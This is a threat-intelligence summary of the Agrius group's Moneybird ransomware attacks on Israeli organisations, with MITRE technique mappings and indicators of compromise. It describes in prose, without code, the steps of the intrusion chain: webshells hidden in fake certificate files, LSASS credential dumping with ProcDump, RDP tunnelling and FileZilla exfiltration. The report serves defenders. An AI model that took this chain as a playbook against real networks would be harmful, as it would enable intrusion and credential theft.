Two security researchers analyze Agrius’ use of Moneybird, a targeted ransomware variant, against Israeli organizations and reveal its sophisticated yet narrowly-focused approach. The findings show Moneybird is a new tool in Agrius’ arsenal, with bespoke encryption features and strong ties to the group’s established TTPs.
#Moneybird #Agrius #Shirbit #BarIlanUniversity #Apostle #MOIS
#Moneybird #Agrius #Shirbit #BarIlanUniversity #Apostle #MOIS
Keypoints
- Agrius, an Iran-aligned threat actor, continues to target Israeli targets, masking destructive operations as ransomware.
- Moneybird is a newly observed ransomware written in C++, deployed by the group in recent Israeli attacks.
- Moneybird appears under a Moneybird alias but is linked to Agrius, with data leakage tied to a known alias.
- The operation uses a targeted approach and specific paths for encryption, rather than mass-wide campaigns.
- Moneybird’s TTPs align with Agrius’ established techniques, tools, and procedures, signaling continuity in behavior.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Agrius’ first foothold was established by exploiting vulnerabilities within public-facing web servers; ‘exploiting vulnerabilities within public-facing web servers, leading to the deployment of unique variants of ASPXSpy.’
- [T1505.003] Web Shell – ASPXSpy webshells were deployed in a unique fashion, hidden inside a Certificate text file; ‘ASPXSpy webshells were deployed in a unique fashion, hidden inside “Certificate” text files.’
- [T1046] Network Service Discovery – Publicly used SoftPerfect Network Scanner to scan internal networks; ‘SoftPerfect Network Scanner – Scan internal networks.’
- [T1021.001] Remote Services – Plink used to tunnel RDP traffic from a VPS; ‘Plink – RDP tunnel traffic from a VPS owned by the actor.’
- [T1003.001] Credential Dumping – ProcDump used to dump LSASS and harvest credentials; ‘ProcDump – Dump LSASS and harvest credentials.’
- [T1041] Exfiltration – FileZilla used to exfiltrate compressed files; ‘FileZilla – Exfiltrate compressed files.’
- [T1486] Data Encrypted for Impact – Moneybird encrypts data using AES-256-GCM with per-file keys; ‘encryption using AES-256 with GCM mode.’
- [T1564] Hide Artifacts – Webshells hidden inside a fake certificate text file illustrate artifact hiding; ‘hidden inside “Certificate” text files.’
Indicators of Compromise
- [Domain] ufile.io, easyupload.io – used by actor to download payloads; ‘legitimate file sharing services ufile[.]io and easyupload[.]io.’
- [File hash] Moneybird sample hash – aa19839b1b6a846a847c5f4f2a2e8e634caeebeeff7af59865aecca1d7d9f43c
- [String] Ransom note phrases – WE ARE MONEYBIRD!, All of your data encrypted!
- [File] Moneybird PDB path – C:UsersuserDesktopmoneybirdx64Releasemoneybird.pdb